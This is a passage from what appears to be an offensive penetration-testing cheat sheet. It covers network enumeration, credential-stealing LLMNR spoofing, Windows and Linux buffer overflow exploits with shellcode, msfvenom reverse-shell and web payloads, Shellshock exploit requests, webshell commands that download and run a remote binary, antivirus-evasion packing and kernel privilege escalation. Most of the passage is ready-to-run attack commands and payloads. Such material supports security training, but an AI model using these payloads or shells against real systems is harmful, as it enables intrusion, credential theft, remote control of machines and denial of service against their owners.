318 | `nc -nvv -w 1 -z $ip 3388-3390`
319 |
320 | - Discover who else is on the network
321 | `netdiscover`
322 |
323 | - Discover IP Mac and Mac vendors from ARP
324 | `netdiscover -r $ip/24`
325 |
326 | - Nmap stealth scan using SYN
327 | `nmap -sS $ip`
328 |
329 | - Nmap stealth scan using FIN
330 | `nmap -sF $ip`
331 |
332 | - Nmap Banner Grabbing
333 | `nmap -sV -sT $ip`
334 |
335 | - Nmap OS Fingerprinting
336 | `nmap -O $ip`
337 |
338 | - Nmap Regular Scan:
339 | `nmap $ip/24`
340 |
341 | - Enumeration Scan
342 | `nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`
343 |
344 | - Enumeration Scan All Ports TCP / UDP and output to a txt file
345 | `nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`
346 |
347 | - Nmap output to a file:
348 | `nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`
349 |
350 | - Quick Scan:
351 | `nmap -T4 -F $ip/24`
352 |
353 | - Quick Scan Plus:
354 | `nmap -sV -T4 -O -F --version-light $ip/24`
355 |
356 | - Quick traceroute
357 | `nmap -sn --traceroute $ip`
358 |
359 | - All TCP and UDP Ports
360 | `nmap -v -sU -sS -p- -A -T4 $ip`
361 |
362 | - Intense Scan:
363 | `nmap -T4 -A -v $ip`
364 |
365 | - Intense Scan Plus UDP
366 | `nmap -sS -sU -T4 -A -v $ip/24`
367 |
368 | - Intense Scan ALL TCP Ports
369 | `nmap -p 1-65535 -T4 -A -v $ip/24`
370 |
371 | - Intense Scan - No Ping
372 | `nmap -T4 -A -v -Pn $ip/24`
373 |
374 | - Ping scan
375 | `nmap -sn $ip/24`
376 |
377 | - Slow Comprehensive Scan
378 | `nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24`
379 |
380 | - Scan with Active connect in order to weed out any spoofed ports designed to troll you
381 | `nmap -p1-65535 -A -T5 -sT $ip`
382 |
383 | - Enumeration
384 | -----------
385 |
386 | - NMap Enumeration Script List:
387 |
388 | - NMap Discovery
389 | [*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html)
390 |
391 | - Nmap port version detection MAXIMUM power
392 | `nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>`
393 |
394 | -
395 |
396 | - SMB Enumeration
397 |
398 | - SMB OS Discovery
399 | `nmap $ip --script smb-os-discovery.nse`
400 |
401 | - Nmap port scan
402 | `nmap -v -p 139,445 -oG smb.txt $ip-254`
403 |
404 | - Netbios Information Scanning
405 | `nbtscan -r $ip/24`
406 |
407 | - Nmap find exposed Netbios servers
408 | `nmap -sU --script nbstat.nse -p 137 $ip`
409 |
410 | - SMB Enumeration Tools
411 | `nmblookup -A $ip `
412 | `smbclient //MOUNT/share -I $ip -N `
413 | `rpcclient -U "" $ip `
414 | `enum4linux $ip `
415 | `enum4linux -a $ip`
416 |
417 | - SMB Finger Printing
418 | `smbclient -L //$ip`
419 |
420 | - Nmap Scan for Open SMB Shares
421 | `nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 $ip/24`
422 |
423 | - Nmap scans for vulnerable SMB Servers
424 | `nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip`
425 |
426 | - Nmap List all SMB scripts installed
427 | `ls -l /usr/share/nmap/scripts/smb\*`
428 |
429 | - Enumerate SMB Users
430 |
431 | - `nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14`
432 |
433 | - `python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip`
434 |
435 | - RID Cycling - Null Sessions
436 | [*https://www.trustedsec.com/march-2013/new-tool-release-rpc\_enum-rid-cycling-attack/*](https://www.trustedsec.com/march-2013/new-tool-release-rpc_enum-rid-cycling-attack/)
437 |
438 | - `ridenum.py $ip 500 50000 dict.txt`
439 |
440 | - `use auxiliary/scanner/smb/smb\_lookupsid`
441 |
442 | - Manual Null Session Testing
443 |
444 | - Windows: `net use \\\\$ip\\IPC$ "" /u:""`
445 |
446 | - Linux: `smbclient -L //$ip`
447 |
448 | - LLMNR / NBT-NS Spoofing - Steal credentials off the network.
449 |
450 | - Spoof / poison LLMNR / NetBIOS requests:
451 | auxiliary/spoof/llmnr/llmnr\_response
452 | auxiliary/spoof/nbns/nbns\_response
453 |
454 | - Capture the hashes:
455 | auxiliary/server/capture/smb
456 | auxiliary/server/capture/http\_ntlm
457 |
458 | - Using Responder to Steal Creds
459 | `git clone https://github.com/SpiderLabs/Responder.git `
460 | `python Responder.py -i local-ip -I eth0`
461 |
462 | - SMTP Enumeration - Mail Severs
463 |
464 | - Verify SMTP port using Netcat
465 | `nc -nv $ip 25`
466 |
467 | - SNMP Enumeration -Simple Network Management Protocol
468 |
469 | - Fix SNMP output values so they are human readable
470 | `apt-get install snmp-mibs-downloader download-mibs `
471 | `echo "" > /etc/snmp/snmp.conf`
472 |
473 | - SNMP Enumeration Commands
474 |
475 | - `snmpcheck -t $ip -c public`
476 |
477 | - `snmpwalk -c public -v1 $ip 1|`
478 |
479 | - `grep hrSWRunName|cut -d\* \* -f`
480 |
481 | - `snmpenum -t $ip`
482 |
483 | - `onesixtyone -c names -i hosts`
484 |
485 | - SNMPv3 Enumeration
486 | `nmap -sV -p 161 --script=snmp-info $ip/24`
487 |
488 | - Automate the username enumeration process for SNMPv3:
489 | `apt-get install snmp snmp-mibs-downloader `
490 | `wget `
491 |
492 | - SNMP Default Credentials
493 | /usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.txt
494 |
495 | - Linux OS Enumeration
496 |
497 | - List all SUID files
498 | `find / -perm -4000 2>/dev/null`
499 |
500 | - Determine the current version of Linux
501 | `cat /etc/issue`
502 |
503 | - Determine more information about the environment
504 | `uname -a`
505 |
506 | - List processes running
507 | `ps -xaf`
508 |
509 | - List the allowed (and forbidden) commands for the invoking use
510 | `sudo -l`
511 |
512 | - List iptables rules
513 | `iptables --table nat --list
514 | iptables -vL -t filter
515 | iptables -vL -t nat
516 | iptables -vL -t mangle
517 | iptables -vL -t raw
518 | iptables -vL -t security`
519 |
520 | - Windows OS Enumeration
521 |
522 |
523 | - net config Workstation
524 |
525 | - systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
526 |
527 | - hostname
528 |
529 | - net users
530 |
531 | - ipconfig /all
532 |
533 | - route print
534 |
535 | - arp -A
536 |
537 | - netstat -ano
538 |
539 | - netsh firewall show state
540 |
541 | - netsh firewall show config
542 |
543 | - schtasks /query /fo LIST /v
544 |
545 | - tasklist /SVC
546 |
547 | - net start
548 |
549 | - DRIVERQUERY
550 |
551 | - reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
552 |
553 | - reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
554 |
555 | - dir /s *pass* == *cred* == *vnc* == *.config*
556 |
557 | - findstr /si password *.xml *.ini *.txt
558 |
559 | - reg query HKLM /f password /t REG_SZ /s
560 |
561 | - reg query HKCU /f password /t REG_SZ /s
562 |
563 | - Vulnerability Scanning with Nmap
564 |
565 | - Nmap Exploit Scripts
566 | [*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)
567 |
568 | - Nmap search through vulnerability scripts
569 | `cd /usr/share/nmap/scripts/
570 | ls -l \*vuln\*`
571 |
572 | - Nmap search through Nmap Scripts for a specific keyword
573 | `ls /usr/share/nmap/scripts/\* | grep ftp`
574 |
575 | - Scan for vulnerable exploits with nmap
576 | `nmap --script exploit -Pn $ip`
577 |
578 | - NMap Auth Scripts
579 | [*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html)
580 |
581 | - Nmap Vuln Scanning
582 | [*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)
583 |
584 | - NMap DOS Scanning
585 | `nmap --script dos -Pn $ip
586 | NMap Execute DOS Attack
587 | nmap --max-parallelism 750 -Pn --script http-slowloris --script-args
588 | http-slowloris.runforever=true`
589 |
590 | - Scan for coldfusion web vulnerabilities
591 | `nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`
592 |
593 | - Anonymous FTP dump with Nmap
594 | `nmap -v -p 21 --script=ftp-anon.nse $ip-254`
595 |
596 | - SMB Security mode scan with Nmap
597 | `nmap -v -p 21 --script=ftp-anon.nse $ip-254`
598 |
599 | - File Enumeration
600 |
601 | - Find UID 0 files root execution
602 |
603 | - `/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null`
604 |
605 | - Get handy linux file system enumeration script (/var/tmp)
606 | `wget `
607 | `chmod +x ./linux-local-enum.sh `
608 | `./linux-local-enum.sh`
609 |
610 | - Find executable files updated in August
611 | `find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug`
612 |
613 | - Find a specific file on linux
614 | `find /. -name suid\*`
615 |
616 | - Find all the strings in a file
617 | `strings <filename>`
618 |
619 | - Determine the type of a file
620 | `file <filename>`
621 |
622 | - HTTP Enumeration
623 | ----------------
624 |
625 | - Search for folders with gobuster:
626 | `gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip`
627 |
628 | - OWasp DirBuster - Http folder enumeration - can take a dictionary file
629 |
630 | - Dirb - Directory brute force finding using a dictionary file
631 | `dirb http://$ip/ wordlist.dict `
632 | `dirb `
633 |
634 | Dirb against a proxy
635 |
636 | - `dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129`
637 |
638 | - Nikto
639 | `nikto -h $ip`
640 |
641 | - HTTP Enumeration with NMAP
642 | `nmap --script=http-enum -p80 -n $ip/24`
643 |
644 | - Nmap Check the server methods
645 | `nmap --script http-methods --script-args http-methods.url-path='/test' $ip`
646 |
647 | - Get Options available from web server
648 | `curl -vX OPTIONS vm/test`
649 |
650 | - Uniscan directory finder:
651 | `uniscan -qweds -u `
652 |
653 | - Wfuzz - The web brute forcer
654 | `wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test `
655 | `wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ `
656 | `wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"`
657 |
658 |
659 |
660 | - Open a service using a port knock (Secured with Knockd)
661 | for x in 7000 8000 9000; do nmap -Pn --host\_timeout 201
662 | --max-retries 0 -p $x server\_ip\_address; done
663 |
664 | - WordPress Scan - Wordpress security scanner
665 |
666 | - wpscan --url $ip/blog --proxy $ip:3129
667 |
668 | - RSH Enumeration - Unencrypted file transfer system
669 |
670 | - auxiliary/scanner/rservices/rsh\_login
671 |
672 | - Finger Enumeration
673 |
674 | - finger @$ip
675 |
676 | - finger batman@$ip
677 |
678 | - TLS & SSL Testing
679 |
680 | - ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha >
681 | OUTPUT-FILE.html
682 |
683 | - Proxy Enumeration (useful for open proxies)
684 |
685 | - nikto -useproxy http://$ip:3128 -h $ip
686 |
687 | - Steganography
688 |
689 | > apt-get install steghide
690 | >
691 | > steghide extract -sf picture.jpg
692 | >
693 | > steghide info picture.jpg
694 | >
695 | > apt-get install stegosuite
696 |
697 | - The OpenVAS Vulnerability Scanner
698 |
699 | - apt-get update
700 | apt-get install openvas
701 | openvas-setup
702 |
703 | - netstat -tulpn
704 |
705 | - Login at:
706 | https://$ip:9392
707 |
708 | Buffer Overflows and Exploits
709 | ===================================================================================================================================
710 |
711 | - DEP and ASLR - Data Execution Prevention (DEP) and Address Space
712 | Layout Randomization (ASLR)
713 |
714 | - MSFvenom
715 | [*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)
716 |
717 | - Windows Buffer Overflows
718 |
719 | - Controlling EIP
720 |
721 | - locate pattern\_create
722 |
723 | - pattern\_create.rb -l 2700
724 |
725 | - locate pattern\_offset
726 |
727 | - pattern\_offset.rb -q 39694438
728 |
729 | - Verify exact location of EIP - \[\*\] Exact match at offset 2606
730 |
731 | - buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90
732 |
733 | - Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
734 |
735 | - Use Mona to determine a module that is unprotected
736 |
737 | - Bypass DEP if present by finding a Memory Location with Read and
738 | Execute access for JMP ESP
739 |
740 | - Otherwise without DEP, we can stick our
741 |
742 | - Use NASM to determine the HEX code for a JMP ESP instruction
743 |
744 | - /usr/share/metasploit-framework/tools/exploit/nasm\_shell.rb
745 |
746 | - JMP ESP
747 | 00000000 FFE4 jmp esp
748 |
749 | - Run Mona in immunity log window to find (FFE4) XEF command
750 |
751 | - !mona find -s "\\xff\\xe4" -m slmfc.dll
752 | found at 0x5f4a358f - Flip around for little endian format
753 |
754 | - buffer = "A" \* 2606 + "\\x8f\\x35\\x4a\\x5f" + "C" \* 390
755 |
756 | - MSFVenom to create payload
757 | msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=443 -f c
758 | –e x86/shikata\_ga\_nai -b "\\x00\\x0a\\x0d"
759 |
760 | - Final Payload with NOP slide
761 | buffer="A"\*2606 + "\\x8f\\x35\\x4a\\x5f" + "\\x90" \* 8 +
762 | shellcode
763 |
764 | - Create a PE Reverse Shell
765 | msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
766 | -f
767 | exe -o shell\_reverse.exe
768 |
769 | - Create a PE Reverse Shell and Encode 9 times with
770 | Shikata\_ga\_nai
771 | msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
772 | -f
773 | exe -e x86/shikata\_ga\_nai -i 9 -o
774 | shell\_reverse\_msf\_encoded.exe
775 |
776 | - Create a PE reverse shell and embed it into an existing
777 | executable
778 | msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f
779 | exe -e x86/shikata\_ga\_nai -i 9 -x
780 | /usr/share/windows-binaries/plink.exe -o
781 | shell\_reverse\_msf\_encoded\_embedded.exe
782 |
783 | - Create a PE Reverse HTTPS shell
784 | msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip
785 | LPORT=443 -f exe -o met\_https\_reverse.exe
786 |
787 | - Linux Buffer Overflows
788 |
789 | - Run Evans Debugger against an app
790 | edb --run /usr/games/crossfire/bin/crossfire
791 |
792 | - ESP register points toward the end of our CBuffer
793 | add eax,12
794 | jmp eax
795 | 83C00C add eax,byte +0xc
796 | FFE0 jmp eax
797 |
798 | - Check for “Bad Characters” Process of elimination - Run multiple
799 | times 0x00 - 0xFF
800 |
801 | - Find JMP ESP address
802 | "\\x97\\x45\\x13\\x08" \# Found at Address 08134597
803 |
804 | - crash = "\\x41" \* 4368 + "\\x97\\x45\\x13\\x08" +
805 | "\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90"
806 |
807 | - msfvenom -p linux/x86/shell\_bind\_tcp LPORT=4444 -f c -b
808 | "\\x00\\x0a\\x0d\\x20" –e x86/shikata\_ga\_nai
809 |
810 | - Connect to the shell with netcat:
811 | nc -v $ip 4444
812 |
813 | Shells
814 | ===============================================================================================================================
815 |
816 | - Netcat Shell Listener
817 | nc -nlvp 443
818 |
819 | - Spawning a TTY Shell - Break out of Jail or limited shell
820 | You should almost always upgrade your shell after taking control of an apache or www user.
821 | (For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )
822 | (hint: sudo -l to see what you can run)
823 |
824 | - python -c 'import pty; pty.spawn("/bin/sh")'
825 |
826 | - python -c 'import
827 | socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);
828 | s.connect(("$ip",1234));os.dup2(s.fileno(),0);
829 | os.dup2(s.fileno(),1);
830 | os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'
831 |
832 | - echo os.system('/bin/bash')
833 |
834 | - /bin/sh -i
835 |
836 | - perl —e 'exec "/bin/sh";'
837 |
838 | - perl: exec "/bin/sh";
839 |
840 | - ruby: exec "/bin/sh"
841 |
842 | - lua: os.execute('/bin/sh')
843 |
844 | - (From within IRB)
845 | exec "/bin/sh"
846 |
847 | - (From within vi)
848 | :!bash
849 |
850 | - From within vim
851 | Breaking out of vim is done by ':!bash':
852 |
853 | - (From within vi)
854 | :set shell=/bin/bash:shell
855 |
856 | - (From within nmap)
857 | !sh
858 |
859 | - (From within tcpdump)
860 | echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ >
861 | /tmp/.test
862 | chmod +x /tmp/.test
863 | sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst
864 | –Z root
865 |
866 | - from busybox
867 | /bin/busybox telnetd -|/bin/sh -p9999
868 |
869 | - Pen test monkey PHP reverse shell
870 | [*http://pentestmonkey.net/tools/web-shells/php-reverse-shel*](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
871 |
872 | - php-findsock-shell - turns PHP port 80 into an interactive shell
873 | [*http://pentestmonkey.net/tools/web-shells/php-findsock-shell*](http://pentestmonkey.net/tools/web-shells/php-findsock-shell)
874 |
875 | - Perl Reverse Shell
876 | [*http://pentestmonkey.net/tools/web-shells/perl-reverse-shell*](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)
877 |
878 | - PHP powered web browser Shell b374k with file upload etc.
879 | [*https://github.com/b374k/b374k*](https://github.com/b374k/b374k)
880 |
881 | - Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell
882 | https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
883 |
884 | - Web Backdoors from Fuzzdb (
885 | https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
886 |
887 | - Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
888 |
889 | *Linux*
890 |
891 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
892 |
893 | *Windows*
894 |
895 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
896 |
897 | *Mac*
898 |
899 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
900 |
901 | **Web Payloads**
902 |
903 | *PHP*
904 |
905 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
906 |
907 | cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
908 |
909 | *ASP*
910 |
911 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
912 |
913 | *JSP*
914 |
915 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
916 |
917 | *WAR*
918 |
919 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
920 |
921 | **Scripting Payloads**
922 |
923 | *Python*
924 |
925 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
926 |
927 | *Bash*
928 |
929 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
930 |
931 | *Perl*
932 |
933 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
934 |
935 | **Shellcode**
936 |
937 | For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
938 |
939 | *Linux Based Shellcode*
940 |
941 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
942 |
943 | *Windows Based Shellcode*
944 |
945 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
946 |
947 | *Mac Based Shellcode*
948 |
949 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
950 |
951 | **Handlers**
952 | Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
953 |
954 | use exploit/multi/handler
955 |
956 | set PAYLOAD
957 |
958 | set LHOST
959 |
960 | set LPORT
961 |
962 | set ExitOnSession false
963 |
964 | exploit -j -z
965 |
966 | Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
967 |
968 | - SSH to Meterpreter:
969 |
970 | use auxiliary/scanner/ssh/ssh_login
971 |
972 | use post/multi/manage/shell_to_meterpreter
973 |
974 | https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/
975 |
976 | - Compiling Windows Exploits on Kali
977 |
978 | - wget -O mingw-get-setup.exe
979 | http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
980 | wine mingw-get-setup.exe
981 | select mingw32-base
982 |
983 | - cd /root/.wine/drive\_c/windows
984 | wget http://gojhonny.com/misc/mingw\_bin.zip && unzip
985 | mingw\_bin.zip
986 | cd /root/.wine/drive\_c/MinGW/bin
987 | wine gcc -o ability.exe /tmp/exploit.c -lwsock32
988 | wine ability.exe
989 |
990 | - Cross Compiling Exploits
991 |
992 | - gcc -m32 -o output32 hello.c (32 bit)
993 | gcc -m64 -o output hello.c (64 bit)
994 |
995 | - Shellshock
996 |
997 | - git clone
998 |
999 | - ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c
1000 | /cgi-bin/status --verbose
1001 |
1002 | - Shell Shock SSH Forced Command
1003 | Check for forced command by enabling all debug output with ssh
1004 | ssh -vvv
1005 | ssh -i noob noob@$ip '() { :;}; /bin/bash'
1006 |
1007 | - cat file (view file contents)
1008 | echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {
1009 | :;}; echo \\$(</etc/passwd)\\r\\nHost:
1010 | vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
1011 |
1012 | - Shell Shock run bind shell
1013 | echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {
1014 | :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:
1015 | vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
1016 |
1017 | - Shell Shock reverse Shell
1018 | nc -l -p 443
1019 |
1020 | - Buffer Overflow Exploits
1021 |
1022 | - Pass 1000 A’s as a parameter
1023 | ./r00t $(python -c 'print "A" \* 1000')
1024 |
1025 | - Random Pattern Create
1026 | /usr/share/metasploit-framework/tools\# ruby pattern\_create.rb
1027 | 1000
1028 |
1029 | - Determine Pattern offset
1030 | ruby pattern\_offset.rb 0x6a413969
1031 |
1032 | - Pass shell with offset value
1033 | env - ./r00t $(python -c 'print "A"\*268 +
1034 | "\\x80\\xfc\\xff\\xbf" + "\\x90"\*16 +
1035 | "\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80"')
1036 | \# id
1037 |
1038 | - From Fuzzing to Zero Day
1039 | https://blog.techorganic.com/2014/05/14/from-fuzzing-to-0-day/
1040 |
1041 | - Nmap Fuzzers:
1042 |
1043 | - NMap Fuzzer List
1044 | [*https://nmap.org/nsedoc/categories/fuzzer.html*](https://nmap.org/nsedoc/categories/fuzzer.html)
1045 |
1046 | - NMap HTTP Form Fuzzer
1047 | nmap --script http-form-fuzzer --script-args
1048 | 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}'
1049 | -p 80 $ip
1050 |
1051 | - Nmap DNS Fuzzer
1052 | nmap --script dns-fuzz --script-args timelimit=2h $ip -d
1053 |
1054 | File Transfers
1055 | ============================================================================================================
1056 |
1057 | - Post exploitation refers to the actions performed by an attacker,
1058 | once some level of control has been gained on his target.
1059 |
1060 | - Simple Local Web Servers
1061 |
1062 | - Run a basic http server, great for serving up shells etc
1063 | python -m SimpleHTTPServer 80
1064 |
1065 | - Run a basic Python3 http server, great for serving up shells
1066 | etc
1067 | python3 -m http.server
1068 |
1069 | - Run a ruby webrick basic http server
1070 | ruby -rwebrick -e "WEBrick::HTTPServer.new
1071 | (:Port => 80, :DocumentRoot => Dir.pwd).start"
1072 |
1073 | - Run a basic PHP http server
1074 | php -S $ip:80
1075 |
1076 | - Creating a wget VB Script on Windows:
1077 | [*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt)
1078 |
1079 | - Mounting File Shares
1080 |
1081 | - Mount NFS share to /mnt/nfs
1082 | mount $ip:/vol/share /mnt/nfs
1083 |
1084 | - HTTP Put
1085 | nmap -p80 $ip --script http-put --script-args
1086 | http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php
1087 |
1088 | - Uploading Files
1089 | -------------------------------------------------------------------------------------------------------------
1090 |
1091 | - SCP
1092 |
1093 | scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2
1094 |
1095 | scp localfile username@$ip:~/Folder/
1096 |
1097 | - Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
1098 |
1099 | `davtest -move -sendbd auto -url http://$ip`
1100 |
1101 | https://github.com/cldrn/davtest
1102 |
1103 | You can also upload a file using the PUT method with the curl command:
1104 |
1105 | `curl -T 'leetshellz.txt' 'http://$ip'`
1106 |
1107 | And rename it to an executable file using the MOVE method with the curl command:
1108 |
1109 | `curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'`
1110 |
1111 | - Upload shell using limited php shell cmd
1112 | use the webshell to download and execute the meterpreter
1113 | \[curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O
1114 | /tmp/evil" http://$ip/files/sh.php
1115 | \[curl -s --data "cmd=chmod 777 /tmp/evil"
1116 | http://$ip/files/sh.php
1117 | curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php
1118 |
1119 | - TFTP
1120 | mkdir /tftp
1121 | atftpd --daemon --port 69 /tftp
1122 | cp /usr/share/windows-binaries/nc.exe /tftp/
1123 | EX. FROM WINDOWS HOST:
1124 | C:\\Users\\Offsec>tftp -i $ip get nc.exe
1125 |
1126 | - FTP
1127 | apt-get update && apt-get install pure-ftpd
1128 |
1129 | \#!/bin/bash
1130 | groupadd ftpgroup
1131 | useradd -g ftpgroup -d /dev/null -s /etc ftpuser
1132 | pure-pw useradd offsec -u ftpuser -d /ftphome
1133 | pure-pw mkdb
1134 | cd /etc/pure-ftpd/auth/
1135 | ln -s ../conf/PureDB 60pdb
1136 | mkdir -p /ftphome
1137 | chown -R ftpuser:ftpgroup /ftphome/
1138 |
1139 | /etc/init.d/pure-ftpd restart
1140 |
1141 | - Packing Files
1142 | -------------------------------------------------------------------------------------------------------------
1143 |
1144 | - Ultimate Packer for eXecutables
1145 | upx -9 nc.exe
1146 |
1147 | - exe2bat - Converts EXE to a text file that can be copied and
1148 | pasted
1149 | locate exe2bat
1150 | wine exe2bat.exe nc.exe nc.txt
1151 |
1152 | - Veil - Evasion Framework -
1153 | https://github.com/Veil-Framework/Veil-Evasion
1154 | apt-get -y install git
1155 | git clone https://github.com/Veil-Framework/Veil-Evasion.git
1156 | cd Veil-Evasion/
1157 | cd setup
1158 | setup.sh -c
1159 |
1160 | Privilege Escalation
1161 | ==================================================================================================================
1162 |
1163 | - Linux Privilege Escalation
1164 | ------------------------------------------------------------------------------------------------------------------------
1165 |
1166 | - Try the obvious - Maybe the user can sudo to root:
1167 | sudo su
1168 |
1169 | - Highon.coffee Linux Local Enum
1170 | `wget https://highon.coffee/downloads/linux-local-enum.sh`
1171 |
1172 | - Basic Linux Privilege Escalation
1173 | [*https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/*](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
1174 |
1175 | - Linux Privilege Exploit Suggester
1176 | [*https://github.com/PenturaLabs/Linux\_Exploit\_Suggester*](https://github.com/PenturaLabs/Linux_Exploit_Suggester)
1177 |
1178 | - Linux post exploitation enumeration and exploit checking tools
1179 | [*https://github.com/reider-roque/linpostexp*](https://github.com/reider-roque/linpostexp)
1180 |
1181 | - CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
1182 | [*https://www.exploit-db.com/exploits/15285/*](https://www.exploit-db.com/exploits/15285/)
1183 |
1184 | - CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo
1185 | / Ubuntu x86/x64)
1186 | [*https://git.zx2c4.com/CVE-2012-0056/about/*](https://git.zx2c4.com/CVE-2012-0056/about/)
1187 | Linux CVE 2012-0056
1188 | wget -O exploit.c
1189 | gcc -o mempodipper exploit.c
1190 | ./mempodipper
1191 |
1192 | - CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux
1193 | Kernel <= 3.19.0-73.8
1194 | [*https://dirtycow.ninja/*](https://dirtycow.ninja/)
1195 | First existed on 2.6.22 (released in 2007) and was fixed on Oct 18,
1196 | 2016
1197 | ./cow32
1198 | DirtyCow root privilege escalation
1199 | Backing up /usr/bin/passwd.. to /tmp/bak
1200 | Size of binary: 45420
1201 | Racing, this may take a while..
1202 | thread stopped
1203 | thread stopped
1204 | /usr/bin/passwd is overwritten
1205 | Popping root shell.
1206 |
1207 | - Run a command as a user other than root
1208 | sudo -u waldo /usr/bin/vim
1209 | /etc/apache2/sites-available/000-default.conf
1210 |
1211 | - Add a user or change a password
1212 | /usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor
